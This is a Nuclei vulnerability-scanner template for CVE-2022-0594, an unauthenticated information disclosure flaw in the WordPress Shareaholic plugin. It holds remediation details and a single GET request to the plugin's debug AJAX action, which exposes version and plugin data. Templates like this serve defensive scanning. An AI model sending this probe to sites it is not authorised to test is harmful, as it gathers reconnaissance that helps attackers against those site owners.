nuclei-templates/http/cves/2022/CVE-2022-0594.yaml

55 lines
2.1 KiB
YAML

id: CVE-2022-0594
info:
name: WordPress Shareaholic <9.7.6 - Information Disclosure
author: atomiczsec
severity: medium
description: WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.).
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the target system.
remediation: |
Update the Shareaholic plugin to version 9.7.6 or later to fix the information disclosure vulnerability.
reference:
- https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1
- https://wordpress.org/plugins/shareaholic/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0594
- https://nvd.nist.gov/vuln/detail/CVE-2022-0594
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-0594
cwe-id: CWE-863
epss-score: 0.00279
epss-percentile: 0.64826
cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: shareaholic
product: shareaholic
framework: wordpress
tags: cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan,shareaholic
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'plugin_version'
- 'shareaholic_server_reachable'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 490a0046304402202240552f28c31f18475cf01e0839da8e4d003adee7d341a6acff3d9c3e4ed26f02205caa0ad0e76c7ff22f1330aa4d7c6357e7add35c12e309d59ef303dd4befe7e1:922c64590222798bb761d5b6d8e72950